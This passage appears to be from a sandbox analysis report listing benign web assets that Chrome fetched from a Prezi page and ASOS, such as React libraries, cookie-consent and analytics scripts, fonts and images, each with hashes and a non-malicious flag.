                                                                                                                                                                                              Preview:TFASC.trkCallback({"trc":{"si":"1972545500a56fc550e56faa29ded78b","sd":"v2_1972545500a56fc550e56faa29ded78b_ea2ecf9f-3d6e-4ec7-b53a-6e1f1109cf47-tucte251d15_1730910102_1730910102_CNawjgYQ4_E9GMqyoJKwMiABKAMw4QE4kaQOQPzYD0jC2NkDUPsEWABgAGiQgI6I5eeGxhBwAYABAA","ui":"ea2ecf9f-3d6e-4ec7-b53a-6e1f1109cf47-tucte251d15","plc":"DESK","wi":"-9170184609159581369","cc":"US","route":"LA:LA:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1013987","cpb":"EhIyMDI0MTEwMi0zLVJFTEVBU0UYASCc__________8BKhlsYS50YWJvb2xhc3luZGljYXRpb24uY29tMg90cmMtdHJhY2tpbmcyMDM4gPT77wpAkaQOSPzYD1DC2NkDWPsEYwjoRBCJWxgwZGMInX4Q36ABGDJkYwjd__________8BEN3__________wEYI2RjCJYUEJocGBhkYwjSAxDgBhgIZGMI9f__________ARD1__________8BGAtkYwieaBC0lwEYPWRjCKByENmSARg-ZGMI4f__________ARDh__________8BGB9kYwikJxCDNRgvZHgBgAHiI4gBy5mQ0gGQARiYAb7GoJKwMtsBEAHcAQ","evh":"-393051744","evi":{"48":"8808|11657","50":"16157|20575","61":"13342|19380","62":"14624|18777","47":"5028|6787"},"vl
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 600 x 106, 8-bit colormap, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4036
                                                                                                                                                                                              Entropy (8bit):7.806157835029585
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:13CFAC93F102CCA813515B432E292220
                                                                                                                                                                                              SHA1:2515DA7707D11C89185C9021F0000CFFBE0578F9
                                                                                                                                                                                              SHA-256:A335FC1DA4A5FFC1FCACFA3EAB57506FAA41F026954496BECB59CF5FBCD99D0E
                                                                                                                                                                                              SHA-512:7C6B0361959E8667CF28E63149A31CC141AF2F9B3FE7DC758BCC19146ABBD2573D333D52F7DF9D7CE10CD2F7F2DF9BECB300BFE839CA76590508D3360ABE7849
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:.PNG........IHDR...X...j.....W..a....PLTE...O._P._P.`S.\T.\T.]T.^T.`U.ZU.]U.`V.]V.^X._X.`S.\S.^T.^T.]U.]U.^P.`P.`P.XP.`X.`P.`X.`U.ZU.`U.ZU.`T.\T.`T.\T.`T.^S.\S.`S.\V.^U.]U.`V.^U.]U.^W.^T.]V.]T.]V.^T.^V.^S.^T._V.]V._S.\S.^U.]U._U.]U._T.\T.^V.]V._T.]U.^V.]V._U.^T.]U.]T.]U.]U.^T.^U.^U.^U.^U.^U.^U.^U.^U.^...W...VtRNS........................ !!0011@@AAOPPQ_```aooppq.....................................Nv....IDATx..o{....m.tk.-f&&RK..kzU....q..Ns....`...(.l.D..;.!...21).......... ..Bv...}.......`y.<X.,/8.<Xby.....`y.<X._...X.....r .~.`...%..~.`.J......+..K,...,].=Xb....+K..X...,]..`..{.t.{..r...`iJ-....z......K,.4..K{Q...-.=Xxa.,|..V88.Mg.E%...d.ar...B6JB.....-nD.....=..wR).FA...........M.......v.{...PMY...]@..o..,.....Y..=H.]....|....d..g}q.....v~Ahg....Iq..K....)...N{t..^J..d+.I.'=...7..]0..L.n.,.O.r......j2...v6.f..Gg.c.".o...+e...'....r...+.X.6[.+.0U..p..i.....V.V 1.+|..h...Q.....Z....f.`.B..p2gZ...c....>X...*'....-.`M..;.k..4..!X*K.'oCM.^.8..7a....s.V8/;....W.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (559)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):120560
                                                                                                                                                                                              Entropy (8bit):5.370822631971791
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:23D1AC8B76C1430E7D568B4980CF812B
                                                                                                                                                                                              SHA1:52D83603C4026874B1B723A3F72EFE1AF6FEE1D0
                                                                                                                                                                                              SHA-256:FBDB08DDB8CD4F9F6481C61E93F84E7C57DF22D57F9FB21E138FEAB6E226553E
                                                                                                                                                                                              SHA-512:13C3B31D6CCAA133942B38D927E6F309E0409D0331DEC55A8ADFC0227387D5348C33CBB3FF41613BF854975D2F5008282B45043329911BF33F14F3E7B6868AAC
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets1.prezicdn.net/frontend-packages/react-dom@17.0.0/umd/react-dom.production.min.js
                                                                                                                                                                                              Preview:/** @license React v17.0.0. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(M,ha){"object"===typeof exports&&"undefined"!==typeof module?ha(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function Ta(a,b){gb(a,b);gb(a+"Capture",b)}function gb(a,b){Ib[a]=b;for(a=0;a<b.length;a++)yf.add(b[a])}function ki(a){if(zf.call(Af,a)
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4533)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):41344
                                                                                                                                                                                              Entropy (8bit):5.117376901572987
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:595FA5603BD086C1207F03FF750414C5
                                                                                                                                                                                              SHA1:039E33921F68C26C9235B82B0BC501D6615D527A
                                                                                                                                                                                              SHA-256:2B9FB4A513E7DEF70080F1A50109B2184A444C40A911ABC6CAE565D088618500
                                                                                                                                                                                              SHA-512:14B2FBCB376776DBCE2202F062E1EF2DC74F12E4715363055D950F159BDA89045390C5558D1F827D04EDF141869C0FBE8A453F0A202864EB97C0D837C3C73498
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://prezi.com/i/amopqalyrbyv/jennifer-zisk-vitron-msw-lsw/
                                                                                                                                                                                              Preview:<!DOCTYPE html><html lang="en"><head > OneTrust Cookies Consent Notice start --><script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" charset="UTF-8" data-domain-script="babb4261-7c8b-4e0d-9b99-ce4e6e126a13"></script><script src="https://package-bundles.prezi.com/cookie-consent/cookie-consent.1.0.6/cookie-consent.js"></script> OneTrust Cookies Consent Notice end --><title>. Jennifer Zisk-Vitron, MSW, LSW by Secure Bill on Prezi Design.</title> Common Metadata --><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="verify-v1" content="eyaAlbc+dH3kl2VfR/7FXmEfNj940c7ERDeqoUWtmUk="><meta name="msvalidate.01" content="256D24D16694018A98CD38E3CB2E4132"><meta name="y_key" content="c35eebc2904a0fbc"><link rel="shortcut icon" href="https://assets.prezicdn.net/assets-versioned/prezipage-versioned/5255-770009b/c
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (544)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):11439
                                                                                                                                                                                              Entropy (8bit):5.359985230087669
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:4EFDF8FAD0D7BFA436A2C00810E1408F
                                                                                                                                                                                              SHA1:9DF7AA3FCEF80D4FEE23233C925ADBCB379F1DA6
                                                                                                                                                                                              SHA-256:359C83B33DBEE80C8528E3B5A9426C800AD795A792D39343185B83BE8731130D
                                                                                                                                                                                              SHA-512:5F9A21BBD8503656136F3E1A4209B8A4F11B4BCC9B9F663C22EC12EA3FA6933AC037F82A5F45E70FF652A7CC1EBAA8419CDE0BE1D60BA1989D3B487F21014FA5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:/** @license React v17.0.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=Y&&a[Y]||a["@@iterator"];return"function"===typeof a?a:null}function y(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,e=1;e<arguments.length;e++)b+="&args[]="+encodeURIComponent(arguments[e]);return"Minified React error #"+.a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function v(a,b,e){this.props=a;this.context=b;this.refs=Z;this.updater=e||aa}function ba(){}function K(a,b,e
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):63090
                                                                                                                                                                                              Entropy (8bit):5.404994394084951
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:E37E6190B35051CD6A74B406FDC084A2
                                                                                                                                                                                              SHA1:0F963BA1933D85859B8BE164FA1949D4FF5D50AF
                                                                                                                                                                                              SHA-256:9A811246367093979C01FC9EA67E8DB8C1B1E5ABBD10FD669D6DE163702C942B
                                                                                                                                                                                              SHA-512:932AA636E32F3E73A034D3859F2D5766DAC547207751B7B7B1EB2D029021120C302E17C4077E7ADA0CFA29A593ED8638D7FFA7A5C45CBCF684059558C6C3B76F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:. {. "name": "otPcCenter",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iPjxkaXYgcm9sZT0iYWxlcnRkaWFsb2ciIGFyaWEtbW9kYWw9InRydWUiIGFyaWEtZGVzY3JpYmVkYnk9Im90LXBjLWRlc2MiPjwhLS0gQ2xvc2UgQnV0dG9uIC0tPjxkaXYgY2xhc3M9Im90LXBjLWhlYWRlciI+PCEtLSBMb2dvIFRhZyAtLT48ZGl2IGNsYXNzPSJvdC1wYy1sb2dvIiByb2xlPSJpbWciIGFyaWEtbGFiZWw9IkNvbXBhbnkgTG9nbyI+PC9kaXY+PGJ1dHRvbiBpZD0iY2xvc2UtcGMtYnRuLWhhbmRsZXIiIGNsYXNzPSJvdC1jbG9zZS1pY29uIiBhcmlhLWxhYmVsPSJDbG9zZSI+PC9idXR0b24+PC9kaXY+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBpZD0ib3QtcGMtY29udGVudCIgY2xhc3M9Im90LXBjLXNjcm9sbGJhciI+PGgyIGlkPSJvdC1wYy10aXRsZSI+WW91ciBQcml2YWN5PC9oMj48ZGl2IGlkPSJvdC1wYy1kZXNjIj48L2Rpdj48YnV0dG9uIGlkPSJhY2NlcHQtcmVjb21tZW5kZWQtYnRuLWhhbmRsZXIiPkFsbG93IGFsbDwvYnV0dG9uPjxzZWN0aW9uIGNsYXNzPSJvdC1zZGstcm93IG90LWNhdC1ncnAiPjxoMyBpZD0ib3QtY2F0ZWdvcnktdGl0bGUiPk1hbmFnZSBDb29raWUgUHJlZmVyZW5jZXM8L2gzPjxkaXYgY2xhc3M9Im90LXBsaS1oZHIiPjxzcGFuIGNsYXNzPSJvdC1saS10aXRsZSI+Q2
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (26940), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):26940
                                                                                                                                                                                              Entropy (8bit):5.19098042866281
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:900456DBCA64E7B7FD6A5885646C4714
                                                                                                                                                                                              SHA1:A20ABC14762D7EEEC31D658336986AF38431ACA3
                                                                                                                                                                                              SHA-256:9492B3C1CD15EF74CCC2A5F1A4EC3F9C5E62705ADC2B63AB2BEA92E261A5E346
                                                                                                                                                                                              SHA-512:AF214382673E4563B41DA8F29DC66B6C100630275D7F314B210F56237EF17DE25D49DF93F70F210A9B51974ACDB7139F7B2C0600E1142A78B97C7D30C6F10553
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://prezi-analytics.com/t.js
                                                                                                                                                                                              Preview:!function(t){var e={};function r(n){if(e[n])return e[n].exports;var o=e[n]={i:n,l:!1,exports:{}};return t[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=t,r.c=e,r.d=function(t,e,n){r.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,e){if(1&e&&(t=r(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)r.d(n,o,function(e){return t[e]}.bind(null,o));return n},r.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(e,"a",e),e},r.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},r.p="",r(r.s=20)}([function(t,e,r){t.exports=!r(3)((function(){return 7!=Object.defineProperty({},"a",{get
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):7428
                                                                                                                                                                                              Entropy (8bit):5.007207199734467
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:82EE49F80F5A2B024F213198A326BE4B
                                                                                                                                                                                              SHA1:F5397AD0EE7E74FB0FE994BAE7B574B7A649F3BF
                                                                                                                                                                                              SHA-256:E6FD8D3512F521FDBD2513D19F893DC3510099A711E0F273098A67AC38F2016F
                                                                                                                                                                                              SHA-512:C15F99A1EE425A141D2A9E9C139B77FE90DBE04DE6471DAEBFFF137E3E2822E0F1F720FB91564990BF35C93AC6A1EC14467758B4163F42CA4A60F5A5DD677BCF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:{"h.key":"KEKMC-5QPEH-Y5FHE-8AH54-JDSN3","h.d":"asos.com","h.t":1730910139005,"h.cr":"e3db28b60cf571546a85d774682db2dcd75b2fe2-e6f7476a-c58388ad","session_id":"dcb9001c-ffb7-4399-9100-b12275f930a8","site_domain":"asos.com","beacon_url":"//02179915.akstat.io/","autorun":true,"instrument_xhr":true,"strip_query_string":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"Continuity":{"enabled":true,"waitAfterOnload":2000},"PageParams":{"xhr":"match","pageGroups":[{"type":"Regexp","parameter1":".*/.*/cat/\\?","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/search($|/|\\?)","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-error/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-unavailable/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/prd/","parameter2":"PDP","on":["navigation"]},{"type":
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 14 names, Microsoft, language 0x409, Copyright 2014 - 2017 Adobe Systems Incorporated (http://www.adobe.com/), with Reserved Font Nam
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):78376
                                                                                                                                                                                              Entropy (8bit):5.928252474830415
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:734AF1CEA6DC030BA4FA8EFFBA2E87DD
                                                                                                                                                                                              SHA1:D00D034499710C006CEBFD10D2998E4E3BF5FE2E
                                                                                                                                                                                              SHA-256:94B5FA7BAC0F406CB3149512037F37EA21B55CECD732C3FD3A076260441399CD
                                                                                                                                                                                              SHA-512:F7A7E8AC2E803D0EE6EAC80ADCF2C256CE0CA3A43DBC94B4A32767FCE50F029573D13FEB59AD17E1A4C361B3A675517D7BEA4621A2A7B32945B8012B8556D1F4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://prezi.com/api/v1/fonts/DMSerifText-Regular-GF/
                                                                                                                                                                                              Preview:........... DSIG......2 ....GDEF.......P....GPOS..........^.GSUB.........lOS/2b..........`cmap ..........Hcvt ......'....Jfpgmb..|........gasp.......H....glyf..g..*....Thead..Gw...,...6hhea.......d...$hmtx.4.........xlocaf8.\..'.....maxp...!....... name..........postQ..........prepj....&...........33..$._.<...........:4........C...............................C.B...................Y.....c.`...d.....".K.............../.........X...K...X...^.2. ...............o...K........GOOG.@.."e.........O .............. .....P.............................................R...[...[...[...[...................*...*...*...*...*...*...*...*...V.......................(...(...(...(...(...(...(...(.......................J.......J...J......... ... ... ... ... .........................................1...>.......q...q...q...q.......................p...p...p...p.......................................y.......k...M...M...M.../.../.../.../...............................................@...................9..
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):468
                                                                                                                                                                                              Entropy (8bit):4.71196957699685
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:064EBB77861D10259FE961B46865B4E6
                                                                                                                                                                                              SHA1:78230845DD4D0C7943B51DF2775BCDED0D59398B
                                                                                                                                                                                              SHA-256:8581A0A98E18F2DCBF798BC0D30A533C6D236CACE77950E4B79864CB59D449D4
                                                                                                                                                                                              SHA-512:944CE521D794BCFC74C0D14F6A6C202481E73C10B817E374DDA8C16379058B7D1CC193195663067BA0A4B58084814E26129D37F3636545E3510EDD149DDB0580
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">..<path fill-rule="evenodd" clip-rule="evenodd" d="M22 12C22 13 17.5228 18 12 18C6.47715 18 2 13 2 12C2 11 6.47715 6 12 6C17.5228 6 22 11 22 12ZM17 12C17 14.7614 14.7614 17 12 17C9.23858 17 7 14.7614 7 12C7 9.23858 9.23858 7 12 7C14.7614 7 17 9.23858 17 12ZM15 12C15 13.6569 13.6569 15 12 15C10.3431 15 9 13.6569 9 12C9 10.3431 10.3431 9 12 9V12H15Z" fill="black"/>.</svg>.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):15086
                                                                                                                                                                                              Entropy (8bit):3.9672871989666185
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:0520A574E13AF7D1B6F2C608364577FF
                                                                                                                                                                                              SHA1:360038AEF0A5E9FF4479A5EB47289BCFF56F4FE4
                                                                                                                                                                                              SHA-256:2E2801B1412647B7E09AE1DA78685C4E4B4AD98945BE191650D84151A23D546F
                                                                                                                                                                                              SHA-512:A1474DD394EC18FE9DAA420A3FA79036154EB72354ACCE2B9109510F141866CAF7067D5856514D1CC20D47D39EA339C638640C0FEC86D62CA32FFA10516A98AE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.prezicdn.net/assets-versioned/prezipage-versioned/5255-770009b/common/img/favicon.ico?v=2
                                                                                                                                                                                              Preview:............ .h...6... .... .........00.... ..%..F...(....... ..... ...........................................................................................................1X..2...2...1...2...2...1X..............................6!..2...2...1X..1...U...1...1X..2...2...6!..................6!..2...2...,...2...2...1...2...2...,...2...2...6!..............2...2...4@..2...2...2...@...2...2...2...4@..2...2...........1X..2...,...2...2.......1.......1.......2...2...,...2...1X......2...1X..2...2...1.......1.......1.......1...2...2...1X..2.......2...1...2...23..1.......1.......1.......1...23..2...1...2.......1...U...1...@...1.......1.......1.......1...;...1...U...1.......2...1...2...23..1.......1.......1.......1...23..2...1...2.......2...1X..2...2...2.......1.......1.......2...2...2...1X..2.......1X..2...,...2...4@......1.......1.......4@..2...,...2...1X..........2...2...4@..2...2...2...@...2...2...2...4@..2...2...............6!..2...2...,...2...2...1...2...2...,...2...2...6!..................
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65450)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):696523
                                                                                                                                                                                              Entropy (8bit):5.39784988888312
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:58CC8ED768ECF9E3A2797886B4F48667
                                                                                                                                                                                              SHA1:E36820A4B7408C7A3D592FA676B23C24D34E57F5
                                                                                                                                                                                              SHA-256:CA6E116D825EF01057C4B35EABA0325D3A57EC8BD46F533C418A47A3FB423D68
                                                                                                                                                                                              SHA-512:EC35C99B5A4FA06FCEE8F35DBA8BE079B3EB17E52B2E4B88C028A73BFC0817FB701441F41F7E4AFBE6FF8AFF11C7D130E5314A79463F5DB4FE7B596AE8821F2C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/sitechromepublisher/vendors.19bb1a8f7876246576f9.js
                                                                                                                                                                                              Preview:/*! For license information please see vendors.19bb1a8f7876246576f9.js.LICENSE.txt */.(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[216],{93468:(e,t,n)=>{"use strict";var r=n(35582),o=n(72686),i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function a(e,t,n,r){return new(n||(n=Promise))((function(o,i){function a(e){try{c(r.next(e))}catch(e){i(e)}}function s(e){try{c(r.throw(e))}catch(e){i(e)}}function c(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(a,s)}c((r=r.apply(e,t||[])).next())}))}function s(e,t){var n,r,o,i,a={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function s(s){return function(c){return function(s){if(n)throw new TypeEr
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (37946), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):38002
                                                                                                                                                                                              Entropy (8bit):5.2633730377792345
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:AC93E0F884509FA284C6B4050C14B1C2
                                                                                                                                                                                              SHA1:65F0342213FEB3BB2FB5262F6E83A9B152983AAD
                                                                                                                                                                                              SHA-256:2421B0D4979D69042E5549D4FF9C1BDADF6B75512C497E5C17381EFC15A6D1B5
                                                                                                                                                                                              SHA-512:329BD5816093E4BEE34FF5EE59C9DD1B7968E5F6757A7054B07D1D3730BDCA7EBAE34B0BFCB05FA7F0EB1202A9264DE815019C108E6C022576FF98078031662D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/asos-ui/sdk/bag-sdk-9.0.0.min.js
                                                                                                                                                                                              Preview:"use strict";var _objectHasOwn=function(t,e){if(null==t)throw new TypeError("Cannot convert undefined or null to object");return Object.prototype.hasOwnProperty.call(Object(t),e)};define("bagsdk/global",[],(function(){return window})),define("bagsdk/utils/getInstanceEventBus",["jquery"],(function(t){if("function"==typeof t)return t({})})),define("bagsdk/utils/sdkInstanceAsyncLoader",["bagsdk/utils/getInstanceEventBus"],(function(t){const e={load:function(e,n,o,i){i.isBuild?o(e):(t.bagSdkInstantiated&&o(e),t.on("bagSdk:instanceReady",(function(){o(e)})))}};return e})),define("Asos.Commerce.Bag.Sdk",["bagsdk/global","bagsdk/utils/sdkInstanceAsyncLoader!dummyModuleName"],(function(t){return["asos","commerce","_bagSdkInstance"].reduce((function(t,e){if(void 0!==t)return t[e]}),t)})),define("bagsdk/config/configuration",[],(function(){return{}})),define("bagsdk/config/defaultConfiguration",["bagsdk/global"],(function(t){return{postMessageUrl:"https://"+t.location.hostname+"/bag/gateway/",ba
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4968
                                                                                                                                                                                              Entropy (8bit):7.951470424892945
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:3E5B3C8CBA480EE7C99233F79ACE5DBE
                                                                                                                                                                                              SHA1:4FF8B41AD8DF40612256D865053076C22BBEE14F
                                                                                                                                                                                              SHA-256:EE92BED1936ADF15AA49A4F42386C4A136CD2805815B049FE92167282D1A0179
                                                                                                                                                                                              SHA-512:AF36583CE71AC58BC45A38CF9CC40A6BA8B77A407535EC69D3E031A826D36C7A36A9C016C23194373B7F271A48C61F6831504AF4C8561C4D966E1B146517EC14
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://cdn.cookielaw.org/logos/static/ot_persistent_cookie.png
                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....p.T.../IDATx...wT....9....Q.Z.jm..?.=.K{.S....Z.V\..+.!....(...XQYd....BH ....d..r.|......;.....s..e...>..y..<..e.-...;.F.}".R.D.R.N..:..%.w>....>..E'G...@...T.j+...>..B.|..L...p..V.G..P...:..#t...To......Xa.;....mkJ........wY.V.i=../.}..Q..............+.X#t....q..X!....jm..`}..].M...{..#.{._e=..^kV.....j+..t..M......M....>..f..\j.^:(R.....\+.|.. .n.{...IB..H.8C.e......^.....r.d...^..U....F..^..Z...t.G....m&$....V".c....)..............^.).....B...3...4g.m;bM.:.`..&Vs].A7S....8......wvuX....\z}.2C...R._GW..1o...o.8..O...^X._.3.M#..o...w3..sN>.n..C+..r.1C.CK.l.?...*L..f..B.ta9.........Y...7.X6.....b.B......^+y.O0..........\.kf.B.^.As{SA....+M..7S...3.1.T}.a.5....4t...yo.}Y.....g*.c...0.w....-(!..l1.vx.....s...4...*~.SVe.O....5.+.>p..T..hp}.!.].Mt8.=.....QQ3.:...i.....O*'Y..v...j.....[.Z|a.....&......d.!...=.0..{.wvu.D....-NRi....S6..l..{..e.)f.pH6r.O..Mn~.b..H.ncje..?_..< .....>.<..W.e^X..b.cS
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (46172), with no line terminators
